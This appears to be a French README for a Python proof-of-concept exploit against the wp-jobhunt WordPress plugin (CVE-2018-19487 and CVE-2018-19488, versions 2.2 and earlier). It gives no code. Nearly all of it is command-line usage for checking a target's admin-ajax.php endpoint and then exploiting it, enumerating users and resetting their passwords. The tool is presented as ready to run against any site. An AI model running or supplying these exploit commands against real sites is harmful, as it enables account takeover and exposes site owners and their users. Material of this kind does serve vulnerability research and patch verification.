
CVE-2018-19487, CVE-2018-19488, exploit pour le plugin WordPress wp-jobhunt
CVE-2018-19487, CVE-2018-19488, exploit pour le plugin WordPress wp-jobhunt
Le plugin wp-jobhunt est un plugin utilisé avec le thème JobCareer :
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (voir le journal des modifications en bas)
Exploit Python pour CVE-2018-19487 (divulgation d'informations utilisateur AJAX) et CVE-2018-19488 (réinitialisation du mot de passe utilisateur AJAX) pour les versions 2.2 et antérieures.
PRÉREQUIS :
UTILISATION :
Vérifiez si le site est vulnérable à l'énumération d'utilisateurs :
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
Vérifiez si le site est vulnérable à la réinitialisation du mot de passe utilisateur :
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
Exploiter l'énumération d'utilisateurs :
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
Exploiter la réinitialisation du mot de passe utilisateur :
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php